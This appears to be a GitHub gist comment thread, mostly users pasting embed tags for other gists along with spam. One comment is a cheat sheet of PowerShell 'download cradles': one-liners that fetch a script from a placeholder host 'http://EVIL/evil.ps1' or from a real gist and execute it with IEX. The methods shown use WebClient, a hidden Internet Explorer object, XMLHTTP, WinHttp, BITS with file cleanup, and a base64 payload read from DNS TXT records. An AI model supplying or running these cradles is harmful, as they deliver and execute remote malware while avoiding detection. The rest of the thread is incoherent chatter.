@mattn
Created April 28, 2011 13:19
<script src=https://gist.github.com/raw/946328/gistfile1.txt ><\/script>
@MRSAJIB
MRSAJIB commented May 22, 2020

<script src="https://gist.github.com/kuamit5516/99897918fd94e8c5310c370f3211e83e.js"></script>

@ahmedmengal
<script src="https://gist.github.com/ahmedmengal/37bdc23b83288c21f83a64adec451efb.js"></script>

@broimagoat
<script src="https://gist.github.com/arguiot/5abf1b7bef3f7be493be3bda63f88dcb.js"></script>

@cheese20plzaddmetothescript

why is the song cradles so good?

@cheese20plzaddmetothescript

normal download cradle

IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

PowerShell 3.0+

IEX (iwr 'http://EVIL/evil.ps1')

hidden IE com object

$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

Msxml2.XMLHTTP COM object

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

WinHttp COM object (not proxy aware!)

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

using bitstransfer - touches disk!

Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)

code to execute needs to be a base64 encoded string stored in a TXT record

IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

from @subTee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d

<#

Get-Process #> $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") $a.command.a.execute | iex

@Bmwx
Bmwx commented Feb 26, 2021

<script src="https://gist.github.com/Watreni/b4e31ca33730ffe7259194cb3b385bb8.js"></script>

@cgu2
cgu2 commented Apr 8, 2021

<script src="https://gist.github.com/ssmereka/6517444.js"></script>

@NathanXID
<script src="https://gist.github.com/NathanXID/2fee8e4c5e6a082dc215f0da91cf7a5c.js"></script>

@EYExPatch
<script src="https://gist.github.com/leaky-coder/4f3c403adfbc7c925bbb239713428f39.js"></script>

@thanhdepzaiheh
<script src="https://gist.github.com/iNPUTmice/28113eecccf50dc81d266c4215cb1264.js"></script>

@martytyty2098
<script src="https://gist.github.com/martytyty2098/baf42f8ff0bfae517971448ee0cdae19.js"></script>

@benchuophobia
@v1ck3
v1ck3 commented Apr 28, 2024

THIS ONE IS MINE !!!

<script src="https://gist.github.com/v1ck3/dcebc4ccd329d14f91e6886aa05b8fab.js"></script>

@Suvinder143
Tsyfigg

@Suvinder143
Hi ugufrdhv

@Suvinder143
Vi hi ha sh hy r jhy

@Suvinder143
Yes nohgffi

@Suvinder143
1000062957
Nabu

@Suvinder143
Yes boss

@Sbauermaner
I'm here with you

@Sbauermaner
IMG_20241006_003731

@Tichi435
<script src="https://gist.github.com/mattn/946330.js"></script>

@Dano6210
guys what should i do with this file?
